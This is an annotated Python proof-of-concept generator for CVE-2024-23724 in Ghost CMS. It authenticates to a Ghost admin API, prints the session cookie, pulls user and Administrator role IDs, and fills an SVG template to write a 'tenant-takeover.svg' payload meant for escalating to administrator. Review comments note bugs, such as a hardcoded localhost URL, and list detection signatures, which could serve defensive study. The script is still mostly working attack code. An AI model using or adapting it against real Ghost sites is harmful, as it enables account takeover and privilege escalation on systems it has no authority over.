import requests
import argparse

# Proof-of-concept generator for CVE-2024-23724 (as labelled by the author).
# What this script does, in order:
#   1. POSTs the supplied credentials to a Ghost admin session endpoint and
#      keeps the first cookie from the Set-Cookie response header.
#   2. GETs the admin users list (with roles) using that cookie.
#   3. Substitutes ids/names from the response into a local SVG template
#      ("boilerplate.svg") and writes the result to "tenant-takeover.svg".
# The SVG content itself lives in the template file, not in this script; this
# file only performs placeholder substitution.
#
# Detection note: both requests carry the fixed header values below
# (X-Ghost-Version "5.75" and the literal Chrome User-Agent string), and the
# endpoints hit are /ghost/api/admin/session then /ghost/api/admin/users/?include=roles.
#
# Set up argparse to accept command line arguments for username, password, and URL
parser = argparse.ArgumentParser(description='Automatically generates an SVG file as a proof-of-concept for CVE-2024-23724')
parser.add_argument('-u', '--username', required=True, type=str, help='Username for authentication')
parser.add_argument('-p', '--password', required=True, type=str, help='Password for authentication')
parser.add_argument('-t', '--target', required=True, type=str, help='Target URL for the Ghost API')
args = parser.parse_args()

# Base URL for the Ghost API
base_url = args.target

# URL for the authentication POST request.
# ":3001" is appended verbatim, so a --target that already carries a port
# would yield a malformed URL.
auth_url = f"{base_url}:3001/ghost/api/admin/session"

# Headers for the authentication request (all static literals)
auth_headers = {
    "Content-Type": "application/json;charset=UTF-8",
    "X-Ghost-Version": "5.75",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36",
    "Accept": "text/plain, */*; q=0.01"
}

# Payload for the authentication request using command line arguments
auth_payload = {
    "username": args.username,
    "password": args.password
}

# Send the authentication POST request.
# NOTE(review): no timeout= is passed, so a non-responding host blocks indefinitely.
auth_response = requests.post(auth_url, json=auth_payload, headers=auth_headers)

# Check if the authentication was successful and extract the cookie.
# Only the first ";"-delimited segment (the name=value pair) is kept; any
# attributes such as Path/HttpOnly are discarded.
if auth_response.status_code == 201 and 'Set-Cookie' in auth_response.headers:
    set_cookie_header = auth_response.headers['Set-Cookie']
    session_cookie = set_cookie_header.split(';')[0]
    # Credential hygiene: this prints a live session credential to stdout,
    # where terminal scrollback or captured logs may retain it.
    print("Session Cookie:", session_cookie)
else:
    print("Failed to authenticate. Status code:", auth_response.status_code)
    print("Response body:", auth_response.text)
    # Uses the site-module exit() helper; sys.exit() is the conventional form.
    exit()

# Step 2: Make the GET request using the obtained cookie
# URL for the GET request.
# Unlike auth_url above, this URL is a fixed literal (localhost:3001) and is not
# derived from --target.
get_url = "http://localhost:3001/ghost/api/admin/users/?include=roles"

# Headers for the GET request, including the session cookie.
# The cookie is sent as a raw "Cookie" header rather than via requests' cookies=.
get_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36",
    "Content-Type": "application/json; charset=UTF-8",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "X-Ghost-Version": "5.75",
    "Cookie": session_cookie
}

# Send the GET request (again without a timeout)
get_response = requests.get(get_url, headers=get_headers)

# Check if the GET request was successful
if get_response.status_code == 200:
    try:
        # KeyError here (no "users" key) is absorbed by the broad except below.
        users_data = get_response.json()["users"]
        # Find the user with the matching username.
        # The comparison is against the "email" field, so --username only
        # matches when it was given as the account's e-mail address.
        user_info = next((user for user in users_data if user["email"] == args.username), None)
        # Find a user with the "Administrator" role to get the Role ID.
        # NOTE: the id taken below is roles[0] of that user, which is the
        # Administrator entry only if it happens to be listed first.
        admin_role_info = next((user for user in users_data if any(role['name'] == 'Administrator' for role in user['roles'])), None)
        # When no administrator is found the placeholder text is kept, so the
        # template's "[Admin-Role-ID]" marker survives unreplaced in the output.
        admin_role_id = admin_role_info['roles'][0]['id'] if admin_role_info else '[Admin-Role-ID]'
        if user_info:
            # Extract required user information (values come straight from the
            # API response; a non-str value would make str.replace raise TypeError)
            user_id = user_info["id"]
            username = user_info["name"]
            slug_name = user_info["slug"]
            user_email = user_info["email"]
            # Read the SVG template from a file.
            # Path is relative to the current working directory; no encoding is
            # given, so the platform default applies.
            with open("boilerplate.svg", "r") as file:
                svg_template = file.read()
            # Replace placeholders in the SVG template
            svg_output = svg_template.replace('[User-ID]', user_id)
            svg_output = svg_output.replace('[User-Name]', username)
            svg_output = svg_output.replace('[Slug-Name]', slug_name)
            svg_output = svg_output.replace('[User-Email]', user_email)
            svg_output = svg_output.replace('[Admin-Role-ID]', admin_role_id)
            # Write the modified SVG to a new file (also CWD-relative, default encoding)
            with open("tenant-takeover.svg", "w") as output_file:
                output_file.write(svg_output)
            print("SVG Code written to tenant-takeover.svg")
        else:
            print("User not found.")
    except Exception as e:
        # Broad catch: JSON decode errors, KeyError/TypeError from the response
        # shape, and OSError from the file I/O all end up here as one message.
        print("Error processing the response or modifying the SVG:", e)
else:
    print("GET Request failed. Status code:", get_response.status_code)
    print("Response body:", get_response.text)